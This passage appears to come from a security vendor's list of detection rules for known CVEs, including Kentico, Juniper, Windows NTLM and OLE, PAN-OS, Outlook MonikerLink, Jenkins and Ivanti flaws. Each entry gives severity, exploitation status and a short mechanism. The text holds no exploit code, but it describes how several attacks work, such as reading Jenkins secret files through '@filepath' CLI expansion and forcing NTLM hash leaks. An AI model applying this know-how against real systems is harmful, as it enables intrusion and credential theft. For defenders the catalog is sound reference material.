Detects exploitation of CVE-2025-2746, an authentication bypass vulnerability (CWE-288) in Kentico Xperience CMS that allows attackers to access protected resources via alternate paths or channels without valid credentials. This vulnerability is actively exploited in the wild (CISA KEV).
vendor: Kentico product: Xperience CMS cwe: CWE-288 disclosed: Oct 20, 2025unscoredwrite-up soon - CVE-2025-2747 KEV
Kentico Xperience CMS Authentication Bypass (CVE-2025-2747)
Detects exploitation of CVE-2025-2747, an authentication bypass vulnerability (CWE-288) in Kentico Xperience CMS. Attackers can access protected administrative or content management endpoints via alternate paths or channels without valid credentials, enabling unauthorized access to sensitive CMS functionality. This vulnerability is actively exploited in the wild and listed in CISA KEV.
vendor: Kentico product: Xperience CMS cwe: CWE-288 disclosed: Oct 20, 2025unscoredwrite-up soon - CVE-2025-21589 Theoretical
Juniper Session Smart Router Authentication Bypass
CVE-2025-21589 is a critical (CVSS 9.8) authentication bypass vulnerability in Juniper Networks Session Smart Router (formerly 128T), Session Smart Conductor, and WAN Assurance Managed Routers. An unauthenticated network attacker can bypass authentication via an alternate path or channel to take full administrative control of affected devices. Affected versions span 5.6.7 through 6.3.x prior to their respective fixed releases (5.6.17, 6.0.8, 6.1.12-lts, 6.2.8-lts, 6.3.3-r2). Successful exploitation gives the attacker administrative access to manage routing, tunnels, and network policy across the SD-WAN fabric — a ransomware precursor and lateral movement enabler in environments where Juniper SSR provides WAN connectivity for branch offices.
vendor: Juniper Networks product: Session Smart Router, Session Smart Conductor… cwe: CWE-288 disclosed: Sep 10, 20259.8 criticalwrite-up soon - CVE-2025-24054 KEV PoC
Windows NTLM Credential Leak via File Download Interaction
CVE-2025-24054 is a medium-severity (CVSS 6.5 per Microsoft, 5.4 per NIST) Windows NTLM spoofing vulnerability caused by external control of file name or path (CWE-73). An attacker can leak NTLMv2 credentials by inducing a victim to download and interact with (or simply unzip) a malicious archive containing a specially crafted .library-ms, .searchConnector-ms, or similar Windows shell integration file. The interaction triggers an automatic NTLM authentication to an attacker-controlled server. CISA added this to the KEV catalog with a due date of May 8, 2025, and public exploits are available on Exploit-DB. This is closely related to CVE-2024-43451 but triggers through different file types (library files, search connectors) rather than .url shortcuts.
vendor: Microsoft product: Windows cwe: CWE-73 disclosed: Mar 11, 20256.5 mediumwrite-up soon - CVE-2025-21298 Public PoC PoC
Windows OLE Remote Code Execution via Malicious RTF Document
CVE-2025-21298 is a critical (CVSS 9.8) use-after-free (CWE-416) remote code execution vulnerability in the Windows Object Linking and Embedding (OLE) subsystem. An attacker can exploit this vulnerability by sending a victim a specially crafted email containing a malicious RTF document. Simply previewing the email in Microsoft Outlook's Preview Pane is sufficient to trigger code execution — no user double-click required. The vulnerability affects all supported Windows versions (Windows 10, 11, Server 2008–2025) and is particularly dangerous in SMB environments where Outlook is the standard email client and Preview Pane is enabled by default. As a critical no-interaction RCE via a ubiquitous file format, this vulnerability is a high-priority patching target.
vendor: Microsoft product: Windows, Windows OLE cwe: CWE-416 disclosed: Jan 14, 20259.8 criticalwrite-up soon - CVE-2024-43451 KEV
Windows NTLM Hash Disclosure via File Interaction (NTLMv2 Spoofing)
CVE-2024-43451 is a medium-severity (CVSS 6.5) NTLM hash disclosure spoofing vulnerability in Windows NTLMv2 authentication. The flaw is triggered when a user opens, inspects, or right-clicks a malicious file (e.g., a .url or specially crafted shortcut file) — Windows automatically initiates an NTLM authentication exchange to an attacker-controlled server, disclosing the user's NTLMv2 hash without any explicit credential entry. The vulnerability stems from CWE-73 (External Control of File Name or Path). CISA added this to the KEV catalog with a remediation deadline of December 3, 2024. NTLMv2 hashes can be cracked offline or relayed for lateral movement, making this a credential harvesting precursor especially effective in phishing and malicious email attachment campaigns.
vendor: Microsoft product: Windows cwe: CWE-73 disclosed: Nov 12, 20246.5 mediumwrite-up soon - CVE-2024-38112 KEV
Windows MSHTML Spoofing via .url File Phishing (Void Banshee)
CVE-2024-38112 is a high-severity (CVSS 7.5) spoofing vulnerability in the Windows MSHTML Platform. Threat actors crafted malicious .url files that, when opened, invoke Internet Explorer's MSHTML engine via the mhtml: URI handler — even on systems where IE is disabled or removed. This allowed attackers to bypass modern browser security controls and render attacker-controlled HTML/JavaScript content, leading to code execution or credential phishing. The vulnerability was actively exploited by the APT group Void Banshee as a zero-day to deliver infostealer malware (Atlantida Stealer) targeting North American and European organisations. CISA added this to the KEV catalog with a remediation deadline of July 30, 2024.
vendor: Microsoft product: Windows, MSHTML Platform cwe: CWE-668 disclosed: Jul 9, 20247.5 highwrite-up soon - CVE-2024-30078 Theoretical
Windows Wi-Fi Driver Remote Code Execution via Adjacent Network
CVE-2024-30078 is a high-severity (CVSS 8.8) remote code execution vulnerability in the Windows Wi-Fi Driver. An unauthenticated attacker within Wi-Fi radio range of a target can execute arbitrary code on the victim's device by sending a specially crafted network packet. No user interaction is required. The attack vector is 'Adjacent Network' (AV:A), meaning the attacker must be on the same network segment or within Wi-Fi broadcast range. All supported Windows versions are affected (Windows 10, 11, Server 2008–2022). This vulnerability is particularly relevant for SMB environments where employees work in shared offices, co-working spaces, hotels, or coffee shops — any shared Wi-Fi environment with other devices in range becomes a potential attack surface. Despite no confirmed in-the-wild exploitation at time of disclosure, the lack of user interaction makes it a high-priority patch.
vendor: Microsoft product: Windows, Windows Wi-Fi Driver cwe: CWE-591 disclosed: Jun 11, 20248.8 highwrite-up soon - CVE-2024-3400 KEV
Palo Alto PAN-OS GlobalProtect Command Injection (Operation MidnightEclipse)
CVE-2024-3400 is a maximum-severity (CVSS 10.0) command injection vulnerability in Palo Alto Networks PAN-OS, specifically in the GlobalProtect feature. The flaw allows unauthenticated remote attackers to execute arbitrary code with root privileges on the firewall by exploiting improper input validation in the GlobalProtect service, which creates arbitrary files that are then executed. Affected versions include PAN-OS 10.2.x (through 10.2.7), 11.0.x, and 11.1.x with GlobalProtect gateway or portal enabled. Cloud NGFW, Panorama, and Prisma Access are not affected. The vulnerability was exploited as a zero-day by the threat actor UTA0218 in Operation MidnightEclipse to deploy the UPSTYLE backdoor. CISA added this to the KEV catalog with active in-the-wild exploitation confirmed. As Palo Alto firewalls are widely deployed by SMBs and enterprises as perimeter security, this is a critical priority.
vendor: Palo Alto Networks product: PAN-OS, GlobalProtect cwe: CWE-77 disclosed: Apr 12, 202410.0 criticalwrite-up soon - CVE-2024-26234 Weaponized PoC
Windows Proxy Driver Spoofing via Malicious Signed Driver
CVE-2024-26234 is a medium-severity (CVSS 6.7) proxy driver spoofing vulnerability in Windows. The vulnerability was discovered when a malicious driver signed with a valid Microsoft Hardware Compatibility Publisher certificate (WHCP) was found in the wild — the driver impersonated a legitimate Xiaomi application but contained proxy/backdoor functionality. The flaw relates to improper access control (CWE-284) in how Windows handles proxy driver installations. Despite the medium CVSS score, this vulnerability has forensic significance as it demonstrates abuse of the Microsoft WHCP signing process for driver-level persistence and traffic interception. It requires high privileges to exploit (local), limiting its attack surface to post-compromise or insider threat scenarios. Useful for detecting signed malicious drivers and driver-based persistence on Windows endpoints.
vendor: Microsoft product: Windows cwe: CWE-284 disclosed: Apr 9, 20246.7 mediumwrite-up soon - CVE-2024-21413 KEV
Microsoft Outlook RCE via Moniker Link (MonikerLink)
CVE-2024-21413 is a critical (CVSS 9.8) remote code execution vulnerability in Microsoft Outlook caused by improper input validation. Dubbed 'MonikerLink', the flaw allows an attacker to craft a malicious hyperlink using the file:// URI scheme combined with an exclamation mark (!), bypassing Outlook's Protected View and MOTW (Mark of the Web) safeguards. When a user clicks the link, Outlook resolves it as a Component Object Model (COM) moniker, triggering NTLM authentication negotiation to an attacker-controlled server (leaking NTLMv2 hashes) and potentially executing arbitrary code. Affected products include Microsoft 365 Apps for Enterprise, Office 2016, Office 2019, and Office LTSC 2021. CISA added this to the KEV catalog with a due date of February 27, 2025, indicating active exploitation in the wild.
vendor: Microsoft product: Outlook, Microsoft 365 Apps… cwe: CWE-20 disclosed: Feb 13, 20249.8 criticalwrite-up soon - CVE-2024-23897 KEV PoC
Jenkins Arbitrary File Read via CLI Argument Parser (Pre-Auth RCE Chain)
CVE-2024-23897 is a critical (CVSS 9.8) arbitrary file read vulnerability in Jenkins CI/CD platform. The Jenkins CLI command parser uses the args4j library's '@' character expansion feature, which substitutes '@filepath' with the file's contents in command arguments. This is not disabled, allowing unauthenticated attackers (or those with minimal permissions) to read arbitrary files from the Jenkins controller filesystem via CLI commands. Files readable include sensitive configuration files (/var/jenkins_home/secrets/master.key, /etc/passwd, credential stores) and can be chained to achieve unauthenticated RCE by extracting cryptographic secrets needed to deserialise malicious data. Affects Jenkins 2.441 and earlier (LTS 2.426.2 and earlier). CISA added to KEV with due date September 9, 2024. Jenkins servers are commonly internet-exposed by development teams in SMB environments.
vendor: Jenkins product: Jenkins cwe: CWE-22 disclosed: Jan 24, 20249.8 criticalwrite-up soon - CVE-2024-21887 KEV
Ivanti Connect Secure Authenticated Command Injection (Chained with CVE-2023-46805)
CVE-2024-21887 is a critical (CVSS 9.1) command injection vulnerability in Ivanti Connect Secure (formerly Pulse Secure) and Policy Secure web components. An authenticated administrator can send specially crafted requests to web endpoints to execute arbitrary commands on the appliance. When chained with CVE-2023-46805 (authentication bypass, CVSS 8.2), the combination allows fully unauthenticated remote code execution. The combined exploit chain was used extensively by the China-nexus threat actor UNC5221 as a zero-day, targeting defence, government, financial, and telecom organisations globally. CISA required mitigation by January 22, 2024. Ivanti Connect Secure VPN appliances are widely deployed by SMBs and enterprises as remote access infrastructure, making this a high-priority detection target.
vendor: Ivanti product: Connect Secure, Policy Secure cwe: CWE-77 disclosed: Jan 12, 20249.1 criticalwrite-up soon